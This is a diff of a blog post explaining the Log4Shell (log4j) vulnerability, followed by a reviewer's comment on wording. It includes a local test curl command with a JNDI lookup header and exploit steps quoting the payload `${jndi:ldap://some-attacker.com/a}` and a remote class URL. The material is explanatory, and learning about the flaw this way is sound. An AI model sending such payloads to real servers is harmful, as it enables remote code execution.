docs/blog/2021-12-09-log4j-zero-day.mdx

```diff
@@ -185,41 +185,42 @@ In a terminal run:
 docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
 ```
 
-and in another:
+And in another:
 
 ```shell
 curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1/a}'
 ```
 
-the logs should include an error message indicating that a remote lookup was attempted but failed:
+The logs should include an error message indicating that a remote lookup was attempted but failed:
 
 ```shell
 2021-12-10 17:14:56,207 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://127.0.0.1/a]. javax.naming.CommunicationException: 127.0.0.1:389 [Root exception is java.net.ConnectException: Connection refused (Connection refused)]
 ```
 
-### Exploit Steps
+### Exploit Steps:
 
-1. Data from the User gets sent to the server (via any protocol),
-2. The server logs the data in the request, containing the malicious payload: `${jndi:ldap://some-attacker.com/a}` (where `some-attacker.com` is an attacker controlled server),
-3. The `log4j` vulnerability is triggered by this payload and the server makes a request to `some-attacker.com` via "[Java Naming and Directory Interface](https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf)" (JNDI),
-4. This response contains a path to a remote Java class file (ex. `http://second-stage.some-attacker.com/Exploit.class`) which is injected into the server process,
+1. Data from the User gets sent to the server (via any protocol).
+2. The server logs the data containing the malicious payload in the request `${jndi:ldap://some-attacker.com/a}`, where `some-attacker.com` is an attacker controlled server.
```

Comment:
unclear rewording, makes it borderline wrong.  "Server logs the data containing the malicious payload from the request." is the clearest way to say it.